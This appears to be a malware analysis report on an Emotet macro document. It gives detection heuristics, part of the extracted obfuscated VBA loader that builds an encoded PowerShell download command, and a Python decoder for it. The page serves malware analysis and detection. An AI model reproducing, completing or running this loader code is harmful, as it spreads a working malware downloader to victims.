Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ed386c7461aa3797…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 105.5 KB
Created: 2018-06-21 12:28:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: c2e77bdf840d1f3addf3d239a707dca8
SHA-1: 8270d2222416244c7728010c625efff91b6eeac5
SHA-256: ed386c7461aa3797a40ba3ca9bd18b43064195d71a64f03017ae0726d6cf2e92
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample carries heavily obfuscated VBA with an AutoOpen entry point, the usual shape of a macro downloader. The PowerShell command line never exists as a single literal in the source: the extracted module builds it from dozens of short string fragments spread across several functions (PzECkQvTXVm and YKILspToChM are the two visible in the preview), padded with For Each loops over undefined variables and meaningless arithmetic that only survive because of On Error Resume Next. The assembled text, which opens with the mixed-case `OwerSHell  -joIn ((` to defeat case-sensitive string matching, is itself a PowerShell -join over an integer array that is turned back into characters only at run time, so neither the command nor any URL appears in the macro as a plain string. Critical heuristics flag the Shell() sink and the obfuscated-loader shape, and ClamAV matches the file as Emotet (Doc.Downloader.Emotet-6877386-0). The decoded command most likely downloads and executes a second-stage payload; the decode routine and the call into the sink fall in the truncated part of the preview, so the download URLs have to be recovered by decoding the array rather than read from the source.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6877386-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877386-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source as plain strings. In this sample the decoder is the numeric char-array variant: the PowerShell command is a -join over integers that are only turned into characters at run time.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that a VBA project was in fact recovered from this sample (see the extracted macros.bas below), so here the marker duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is a standard Office Open XML namespace URI, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16254 bytes
SHA-256: dbc2700e373fd8f1387a1178105328342f6e2721d9458de55637d431aa67e9e1

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zzDdqoJIJdPd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IqMdMXBlOKsKNp"
Function PzECkQvTXVm()
On Error Resume Next
For Each PEzmt In NazwrV
rTSkd = uKOzrV = dbjCD
PkzJMw = (oNAcbF * 89575 + 61882 * CInt(hCZjUO - CDbl(6338)) * 65718 * Oct(66488))
KoChd = 31143 + Atn(93747) / 33997 / Round(73246) / 43960 / CInt(hPboH)
Next
twCCVRwcL = "OwerSHell  -j" + "oIn (( 97 ,35 " + ",28,17, 38 , 43" + " , 101 ,120" + ",101,43 ,32" + " , " + "50 , 104,42 , 3" + "9 , 47, 32,38" + " , 49," + "101,55, 36, "
For Each WcXoh In fjFLtw
fduWwY = CVdio = BDGTdh
oLzNY = (oloUjW * 17062 + 76434 * CInt(PcuTV - CDbl(22324)) * 19933 * Oct(50352))
qSYGR = 37059 + Atn(55468) / 33949 / Round(51030) / 51608 / CInt(dlThvo)
Next
nlSFnmIKV = "43 " + ",33,42, 40 ," + " 126,97 , 29 " + ",41," + "29" + " ,4 , 23 ,46 ," + "10" + "1, 120 ,101, "
For Each nPQdB In EZharN
MRtBsl = aNYOB = dTpBM
hcSpN = (nFfvm * 54490 + 89258 * CInt(FDOUIR - CDbl(3279)) * 81794 * Oct(34181))
UdBGz = 99387 + Atn(42858) / 37011 / Round(12753) / 67545 / CInt(ArKadw)
Next
FwTtvwV = "43 ," + " 32,50 , 1" + "04, 42 ,3" + "9 , 4" + "7, 32,38,49 , "
For Each lNutM In VSEjl
NaRmki = mhGQfL = NLSmP
SQpiz = (KKvCV * 34770 + 91482 * CInt(RXXqtA - CDbl(45041)) * 57898 * Oct(29306))
rbzUzw = 91862 + Atn(26843) / 80595 / Round(71893) / 55034 / CInt(BqUWzY)
Next
YWElZjRV = "101,22" + ", " + "60, 54,49," + " 32 , 40, 10" + "7 ,11, 32, 49, " + "107" + ", 18 ,32 ,39 ," + " 6,41 ,44 , 3" + "2 " + ", 43, 49 , 1"
For Each RGjko In mMOchh
IuLlhl = DrZVi = tAjmiZ
OfHlcw = (mihzwd * 55695 + 57898 * CInt(nqOtM - CDbl(97018)) * 56043 * Oct(15702))
nLzIsa = 73342 + Atn(36318) / 76359 / Round(46660) / 30272 / CInt(zuTCd)
Next
jIiFPz = "26, 97,50" + ", 4" + "7,43 ,31 " + ", 6,101 , " + "120 , " + "101 ,98, 45" + ", 49," + "49, 53,1" + "27, 106,"
For Each Bwosm In IlEwO
zvYuzG = pEcwA = dqWFaI
aPEWD = (zDtGwp * 30726 + 36965 * CInt(TioZw - CDbl(10248)) * 71699 * Oct(64231))
zzcTtp = 5842 + Atn(30343) / 44611 / Round(30585) / 10511 / CInt(ibYIZC)
Next
OjjkwXwEj = "106 , 50 , 5" + "0,50 ,107, 38," + " 43,44, 43 " + ", 44" + " , 43 , 107 ,38" + " ,42" + " ,40, 106" + ",125" + ", 8,1" + ",41 , 125 ,3"
For Each nkJkn In KVFwD
nOpwj = zRTWa = vwbqU
idmfzS = (BKDGR * 78284 + 45109 * CInt(RWEhw - CDbl(4411)) * 44977 * Oct(40076))
skirw = 30010 + Atn(23252) / 84952 / Round(96809) / 1519 / CInt(HrHIc)
Next
tOMwBCNc = "3 ,124,106" + ",5 , 45 , 49 ," + "49 ,53 ,12" + "7 ,106,106" + ", 50,50 , 50 ,1"
For Each jcHSqF In wSwzWa
otdTOW = Xaiqc = vvQCV
qcAikj = (SamqVw * 99913 + 23680 * CInt(TDTFrO - CDbl(25117)) * 67820 * Oct(4334))
UIpmmc = 88579 + Atn(4664) / 40752 / Round(72863) / 55204 / CInt(RcFrC)
Next
vHZqkoj = "07,33 ,55 ," + " 32 ,51 , 4" + "2 " + ", 54,49" + " ,60,41 , 32, 1" + "07, 38, 42 " + ",40 ,10" + "7 , 48 , 36 ,1" + "06" + " , 36 , 124, 11"
PzECkQvTXVm = twCCVRwcL + nlSFnmIKV + FwTtvwV + YWElZjRV + jIiFPz + OjjkwXwEj + tOMwBCNc + vHZqkoj
End Function
Function YKILspToChM()
On Error Resume Next
For Each HXUzZZ In prfXJa
XiPEz = OiLKQX = ujrvz
rHhWz = (rqUTC * 71703 + 95551 * CInt(YAREt - CDbl(54210)) * 90982 * Oct(95843))
CBuob = 34970 + Atn(31917) / 82626 / Round(26696) / 37545 / CInt(wQuBK)
Next
ntVJNzjKo = "8,117," + "61," + " 124 , 1" + "06, 5" + ", 45,49 , 4" + "9 ," + " 53, 127 , 106" + " ,10"
For Each kCuEGp In ajrPFh
wLDOv = BljGST = wvhswQ
zfivF = (unmjuA * 21099 + 90775 * CInt(AdIkw - CDbl(14197)) * 86447 * Oct(5707))
KFiwO = 61808 + Atn(28139) / 12696 / Round(39706) / 71379 / CInt(EcSwt)
Next
cXjNQANmQk = "6 ," + " 39 ,47, " + "45" + ", 35,60,54 " + ",107 ,38, 42 ,"
For Each jsMfI In EcsOi
DDiBl = TVRkt = jubmQ
CEKcp = (qhHzP * 22282 + 90235 * CInt(uBOrT - CDbl(330)) * 3862 * Oct(16982))
LRjdA = 69568 + Atn(84565) / 49304 / Round(6068) / 27047 / CInt(viKus)
Next
hNKuj = "40 , 106,
... (truncated)
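To make the loader shape described in the summary concrete, here is an added Python example that is not part of the analysis page or of any tool's code. It statically folds the string fragments of PzECkQvTXVm exactly as the preview above shows them, extracts the integer array behind `-joIn ((`, and recovers the decoding key. The excerpt embedded in the script is copied from the preview with all but one of the filler loops removed. Two things are assumptions, because the decode routine sits in the truncated part of the preview: that the characters are recovered with a single-byte -bxor (a common shape for this kind of loader, not something the visible source confirms), and that the plaintext contains `http://`, which is used as a known-plaintext crib to pin the key. The Python function names and the crib are the only identifiers not taken from the page.

```python
import re

# Excerpt of PzECkQvTXVm() as it appears in the page's macro preview: the eight
# string-fragment assignments and the final concatenation, with one of the
# dead-code For Each loops kept as representative filler (the others have the
# same shape). The string literals are copied verbatim from the sample.
VBA_EXCERPT = r'''
Function PzECkQvTXVm()
On Error Resume Next
For Each PEzmt In NazwrV
rTSkd = uKOzrV = dbjCD
PkzJMw = (oNAcbF * 89575 + 61882 * CInt(hCZjUO - CDbl(6338)) * 65718 * Oct(66488))
KoChd = 31143 + Atn(93747) / 33997 / Round(73246) / 43960 / CInt(hPboH)
Next
twCCVRwcL = "OwerSHell  -j" + "oIn (( 97 ,35 " + ",28,17, 38 , 43" + " , 101 ,120" + ",101,43 ,32" + " , " + "50 , 104,42 , 3" + "9 , 47, 32,38" + " , 49," + "101,55, 36, "
nlSFnmIKV = "43 " + ",33,42, 40 ," + " 126,97 , 29 " + ",41," + "29" + " ,4 , 23 ,46 ," + "10" + "1, 120 ,101, "
FwTtvwV = "43 ," + " 32,50 , 1" + "04, 42 ,3" + "9 , 4" + "7, 32,38,49 , "
YWElZjRV = "101,22" + ", " + "60, 54,49," + " 32 , 40, 10" + "7 ,11, 32, 49, " + "107" + ", 18 ,32 ,39 ," + " 6,41 ,44 , 3" + "2 " + ", 43, 49 , 1"
jIiFPz = "26, 97,50" + ", 4" + "7,43 ,31 " + ", 6,101 , " + "120 , " + "101 ,98, 45" + ", 49," + "49, 53,1" + "27, 106,"
OjjkwXwEj = "106 , 50 , 5" + "0,50 ,107, 38," + " 43,44, 43 " + ", 44" + " , 43 , 107 ,38" + " ,42" + " ,40, 106" + ",125" + ", 8,1" + ",41 , 125 ,3"
tOMwBCNc = "3 ,124,106" + ",5 , 45 , 49 ," + "49 ,53 ,12" + "7 ,106,106" + ", 50,50 , 50 ,1"
vHZqkoj = "07,33 ,55 ," + " 32 ,51 , 4" + "2 " + ", 54,49" + " ,60,41 , 32, 1" + "07, 38, 42 " + ",40 ,10" + "7 , 48 , 36 ,1" + "06" + " , 36 , 124, 11"
PzECkQvTXVm = twCCVRwcL + nlSFnmIKV + FwTtvwV + YWElZjRV + jIiFPz + OjjkwXwEj + tOMwBCNc + vHZqkoj
End Function
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
LITERAL_SUM = re.compile(r'"[^"]*"(?:\s*\+\s*"[^"]*")*')   # "a" + "b" + ...
NAME_SUM = re.compile(r'[A-Za-z_]\w*(?:\s*\+\s*[A-Za-z_]\w*)*')  # x + y + ...


def fold_string_assignments(src):
    """Statically evaluate the macro's string building.

    Only two statement shapes are honoured: `name = "a" + "b"` (literal
    fragments) and `name = x + y` where every operand is a name already folded.
    The arithmetic filler in the For Each loops and the `a = b = c` comparisons
    match neither shape and are skipped, which is what the loader relies on:
    that junk never contributes a byte to the string.
    """
    strings = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        if LITERAL_SUM.fullmatch(rhs):
            strings[name] = ''.join(re.findall(r'"([^"]*)"', rhs))
        elif NAME_SUM.fullmatch(rhs):
            parts = re.findall(r'[A-Za-z_]\w*', rhs)
            if all(p in strings for p in parts):
                strings[name] = ''.join(strings[p] for p in parts)
    return strings


def char_array(cmd):
    """Integer list behind `... -joIn (( 97 ,35 ,28, ...`.

    Fragments must be joined before tokenising: the split points fall inside
    numbers (`", 43, 49 , 1" + "26, 97,50"` is 126, not 1 and 26).
    """
    return [int(n) for n in re.findall(r'\d+', cmd.split('((', 1)[1])]


def recover_xor_key(data, crib):
    """Known-plaintext search for a single-byte XOR key (assumed decoder).

    Returns the set of keys under which `crib` appears somewhere in the
    decoded bytes; the caller expects exactly one.
    """
    keys = set()
    for i in range(len(data) - len(crib) + 1):
        k = data[i] ^ crib[0]
        if all(data[i + j] ^ k == crib[j] for j in range(len(crib))):
            keys.add(k)
    return keys


def decode_fragment(src, func='PzECkQvTXVm', crib=b'http://'):
    """Fold, extract, recover the key, decode. None if the key is not unique."""
    cmd = fold_string_assignments(src)[func]
    nums = char_array(cmd)
    keys = recover_xor_key(bytes(nums), crib)
    if len(keys) != 1:
        return None
    key = keys.pop()
    return key, ''.join(chr(n ^ key) for n in nums)


if __name__ == '__main__':
    key, text = decode_fragment(VBA_EXCERPT)
    print(f'single-byte XOR key: {key} (0x{key:02x})')
    print(text)
```

Run as a script it prints the key and the decoded text of this one fragment. The command continues in YKILspToChM and beyond, and the trailing `11` of PzECkQvTXVm may be the head of a number completed by the next function's first fragment, just as happens at every boundary inside this function, so the full command is obtained by folding every fragment function and concatenating them in the order the final sink joins them, which is in the truncated tail of the preview. The crib approach is preferable to printable-ratio scoring here because it yields a single key deterministically; if the crib matched under several keys, the function returns None rather than guessing.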